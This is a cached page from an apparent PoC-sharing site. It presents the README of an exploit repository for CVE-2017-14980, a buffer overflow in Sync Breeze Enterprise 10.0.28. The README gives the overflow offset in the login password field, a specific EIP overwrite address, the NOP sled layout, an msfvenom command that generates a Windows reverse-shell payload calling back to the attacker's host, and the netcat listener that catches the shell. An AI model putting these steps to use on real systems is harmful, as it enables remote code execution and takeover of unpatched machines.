Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2017-14980 PoC — Flexense Sync Breeze Enterprise 缓冲区错误漏洞

Source
Associated Vulnerability
Title:Flexense Sync Breeze Enterprise 缓冲区错误漏洞 (CVE-2017-14980)
Description:Flexense Sync Breeze Enterprise是加拿大Flexense公司的一套文件同步工具。该工具具有文件管理和数据同步等功能。 Flexense Sync Breeze Enterprise 10.0.28版本中存在缓冲区溢出漏洞。远程攻击者可利用该漏洞执行任意代码或造成拒绝服务。
Readme
# Exploit - CVE-2017-14980 - Sync Breeze Enterprise v10.0.28

Este repositório contém um exploit de **buffer overflow (BOF)** para a aplicação **Sync Breeze Enterprise** na versão **10.0.28**, explorando a vulnerabilidade identificada como **CVE-2017-14980**.

## 📌 Descrição

A vulnerabilidade ocorre devido à ausência de validação adequada no processamento do campo `password` durante uma requisição `POST` para o endpoint `/login`. Um atacante pode enviar um valor excessivamente longo neste campo e sobrescrever o **EIP**, permitindo a execução arbitrária de código.

Este exploit envia um payload cuidadosamente construído com:

- 520 bytes de preenchimento (`'A'`)
- 4 bytes para sobrescrever o EIP
- Um **NOP sled** de 20 bytes
- Um **shellcode Windows x86** que pode ser ajustado para execução de comandos arbitrários

## ⚙️ Como funciona

1. Constrói o buffer malicioso com o shellcode embutido.
2. Envia uma requisição HTTP `POST` para o servidor com o payload no campo `password`.
3. Ao processar a requisição, o aplicativo vulnerável sobrescreve o ponteiro de instrução (EIP) e executa o shellcode.


## 🛠️ Requisitos

- Compilador C (ex: `gcc`)
- Acesso à rede com o alvo rodando Sync Breeze Enterprise 10.0.28
- Ajuste do endereço de EIP (`\x83\x0C\x09\x10`) e shellcode, se necessário 
- msfvenom -p windows/shell_reverse_tcp LHOST=<SEU_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c

## 🧪 Execução

```bash
gcc exploit.c -o exploit
./exploit

```
Em outro terminal:
```bash
nc -nlvp 4444
File Snapshot

[4.0K] /data/pocs/b7092e9c343ea902628115f6413cbde0a39785d3 ├── [4.1K] exploit.c └── [1.5K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.